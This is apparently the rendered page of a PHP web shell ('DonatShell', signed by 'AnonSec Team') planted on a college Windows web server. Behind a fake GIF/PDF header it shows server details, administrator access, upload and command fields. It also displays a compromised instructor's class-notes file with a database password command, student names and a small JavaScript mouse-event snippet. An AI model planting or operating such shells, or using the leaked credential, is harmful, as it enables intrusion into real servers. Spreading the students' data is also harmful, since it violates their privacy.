GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/Classes/CST2146/Notes/Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/Classes/CST2146/Notes/Archive/MMDT2146_wk07_20200228_F.txt
Notes:
There is a programming error.
The task [Move meetings], subtask [], form [Schedule_form] is not programmed.
Please notify the website administrator Jim Martinson at jim.jimmartinson@ridgewater.edu.
Please include the content of this page in the body of the email.
Backtrace:	index.php:88 (C:\nginx\html\Schedule\index.php).


alter user 'scheduler'@'%' identified with mysql_native_password by 'Scheduler2146';


2020-02-28 10 points. Attended Friday work session.

Attended:
Abdifatah Mohamed
Alexander Gould
Austin Lease
Branden Buermann
Christopher Seiffert
Cody Raduenz
Damien Carlson
Darrien McAllister
Jameashia Nwankwo
Kathryn Nelson
Natasha Iverson

Students:
Abdifatah Mohamed
Alexander Gould
Austin Lease
Branden Buermann
Christopher Seiffert
Cody Raduenz
Damien Carlson
Darrien McAllister
Drew Kallhoff
Jameashia Nwankwo
Kathryn Nelson
Leah Schmid
Natasha Iverson
Terence Jackson
Zachary Nordmeyer


detect mouse move vs click:

const element = document.createElement('div')
element.innerHTML = 'test'
document.body.appendChild(element)
let moved
let downListener = () => {
    moved = false
}
element.addEventListener('mousedown', downListener)
let moveListener = () => {
    moved = true
}
element.addEventListener('mousemove', moveListener)
let upListener = () => {
    if (moved) {
        console.log('moved')
    } else {
        console.log('not moved')
    }
}
element.addEventListener('mouseup', upListener)

// release memory
element.removeEventListener('mousedown', downListener)
element.removeEventListener('mousemove', moveListener)
element.removeEventListener('mouseup', upListener)

Anon7 - 2022
AnonSec Team